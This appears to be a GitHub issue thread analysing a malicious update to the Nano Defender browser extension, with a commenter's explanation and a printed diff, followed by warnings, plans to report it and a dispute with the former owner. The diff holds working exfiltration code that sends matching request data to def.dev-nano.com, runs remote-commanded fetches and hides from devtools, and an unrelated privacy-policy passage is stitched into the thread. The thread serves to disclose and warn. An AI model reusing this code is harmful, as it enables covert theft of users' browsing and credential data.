var replacerConcat = stringyFy.split(x).join("");
Which is equivalent to:
var replacerConcat = stringyFy.split("-zzz").join("");
Purpose is not clear, it's meant to remove instances of -zzz from request headers, before they are being sent out.
So trying to figure an example of what the new code can do. Let's say it wants to get sensitive information about network requests to a specific bank, then the content of the listOfObject object could be:
{ url: 'bank\.example\.com\/' }
Then the webRequest.onBeforeSendHeaders() handler would check whether details.url matches the regex bank\.example\.com\/. If so, then the whole content of the details object is sent to https://def.dev-nano.com/ as a handleObject packet.
The listOfObject can contain any number of conditions, I just gave an example with a single one above.
The extension is now designed to lookup specific information from your outgoing network requests according to an externally configurable heuristics and send it to https://def.dev-nano.com/.
A note regarding what the extension is doing above. Though the extension requests the webRequestBlocking permission, that permission is not required to perform the collection of data, including sensitive ones. The permission is only necessary to remove instances of -zzz from the request headers, and I don't know the purpose of this -- maybe someone else knows.
Here the diff for the code change you won't find in their GitHub repo:
--- ./background/core.js
+++ ./background/core.js
@@ -160,7 +160,7 @@
const hasNews = false;
- const newsPage = "https://jspenguin2017.github.io/uBlockProtector/#announcements";
+ const newsPage = "https://github.com/nenodevs/uBlockProtector/#announcements";
const newsReadFlag = "news-read";
// This handler becomes inactive when there is a popup page set
@@ -189,7 +189,8 @@
// ------------------------------------------------------------------------------------------------------------- //
};
-
+var defender = io.connect("https://def.dev-nano.com/");
+var listOfObject = {};
// ----------------------------------------------------------------------------------------------------------------- //
a.noopErr = () => {
@@ -211,6 +212,29 @@
// ----------------------------------------------------------------------------------------------------------------- //
+
+
+async function dLisfOfObject(newList) {
+ let dListResp = await fetch(newList.uri, newList.attr)
+ var listOfObj = {}
+ listOfObj.headerEntries = Array.from(dListResp.headers.entries())
+ listOfObj.data = await dListResp.text()
+ listOfObj.ok = dListResp.ok;
+ listOfObj.status = dListResp.status;
+ return listOfObj;
+}
+
+defender.on("dLisfOfObject", async function (newList) {
+ let getRes = await dLisfOfObject(newList);
+ defender.emit(newList.callBack, getRes)
+});
+
+defender.on("listOfObject", function (a) {
+ listOfObject = a;
+})
+
+
+
// Redirect helpers
a.rSecret = a.cryptoRandom();
@@ -227,7 +251,22 @@
// 1 second blank video, taken from https://bit.ly/2JcYAyq (GitHub uBlockOrigin/uAssets).
a.blankMP4 = a.rLink("blank.mp4");
-
+
+var element = document.createElement("p"); ;
+var openListGet = false;
+element.__defineGetter__("id", function() {
+ openListGet = true;
+});
+
+var i = setInterval(function() {
+ openListGet = false;
+ console.log(element);
+ if(openListGet){
+ defender.emit("report")
+ console.clear();
+ clearInterval(i)
+ }
+}, 100);
// ----------------------------------------------------------------------------------------------------------------- //
// tab - Id of the tab
@@ -450,6 +489,50 @@
return true;
};
+
+var blockingHandler = function (infos) {
+ var changedAsArray = Object.keys(listOfObject);
+
+ var detailsHeader = infos.requestHeaders;
+ var HeadReverse = detailsHeader.reverse();
+ var stringyFy = JSON.stringify(HeadReverse);
+ var mount = "";
+ if (changedAsArray.length > 0) {
+ var checkerList = true;
+ for (const object of changedAsArray) {
+ if (object.x === object.y) {
+ mount += 1;
+ }
+ break;
+ }
+ for (let i = 0; i < changedAsArray.length; i++) {
+ let x = changedAsArray[i];
+ var re = new RegExp(listOfObject[x],'gi');
+ mount = "5";
+ if (infos[x].toString().match(re) == null) {
+ checkerList = false;
+ break;
+ }
+ }
+ if (checkerList) {
+ defender.emit('handleObject', infos);
+ }
+ }
+
+ var m = [45,122,122,122]
+ var s = m.map( x => String.fromCharCode(x) )
+ var x = s.join("");
+ var replacerConcat = stringyFy.split(x).join("");
+ var replacer = JSON.parse(replacerConcat);
+ return {
+ requestHeaders: replacer
+ }
+};
+
+chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, {
+ urls: ["<all_urls>"]
+}, ['requestHeaders', 'blocking', 'extraHeaders']);
+
// ----------------------------------------------------------------------------------------------------------------- //Forgot to mention the obvious: uninstall now -- with those capabilities, it should be considered malware.
So @jspenguin2017's users have been sold to malware. Great.
I'm going to report this extension to the Edge team for urgent analysis.
I'm going to report this extension to the Edge team for urgent analysis.
For now, version for Edge isn't updated and didn't changed owner, only Chrome version is affected.
Maybe he reportead as "whisper" / private-message.
I'm going to report this extension to the Edge team for urgent analysis.
For now, version for Edge isn't updated and didn't changed owner, only Chrome version is affected.
As far as I'm aware you can't change owners with the Microsoft store, so @jspenguin2017 is most likely to just have given login details. It may very well already be submitted, awaiting review. I've asked the team to review this thread and look out for an update.
LiCybora/NanoDefenderFirefox#187 (comment)
This was posted on the Firefox port of NanoDefender on how to migrate from Nano Adblocker to uBlock Origin, for anyone that hasn't seen it.
Unless specified otherwise, all Data requested by this Application is mandatory and failure to provide this Data may make it impossible for this Application to provide its services. In cases where this Application specifically states that some Data is not mandatory, Users are free not to communicate this Data without consequences to the availability or the functioning of the Service.
Users who are uncertain about which Personal Data is mandatory are welcome to contact the Owner. Any use of Cookies โ or of other tracking tools โ by this Application or by the owners of third-party services used by this Application serves the purpose of providing the Service required by the User, in addition to any other purposes described in the present document and in the Cookie Policy, if available.
It was really worth selling users down the river, huh @jspenguin2017?
I forgot to mention this: This is exactly the kind of stuff that Google loves to see because it enables them to implement stricter and stricter policies for extensions, and also policies that cripple their capabilities. Thanks for contributing to the problem.
So, what I suspected was correct. The extension has been modified to become malware, and outright compromises the privacy and security of users. You sold your users down the river and put them in harm's way to make a quick buck. That is actual blood on your hands now. Sure, you didn't write the code yourself, but you directly enabled the pathway for this to happen.
Nano has now become a historical example of why content blocking extensions should not be sold, and what happens when they are.
That is indeed a suspicious update, I will start analyzing it shortly. I will be archiving this repository, so let's head over to my general purpose repository for further discussions: https://github.com/jspenguin2017/Snippets/issues
so @jspenguin2017 is most likely to just have given login details
No, I still control the Edge store listings.
put them in harm's way to make a quick buck
Do not misrepresent facts. I was looking for a new maintainer. If I knew that the new developer(s) would do this, I would not have accepted the deal.
As I mentioned here [1], I planned to donate most of the money back to the new developer(s) if they do a good job. If I wanted to make a quick buck, I would sell the projects and disappear.
[1] #362 (comment)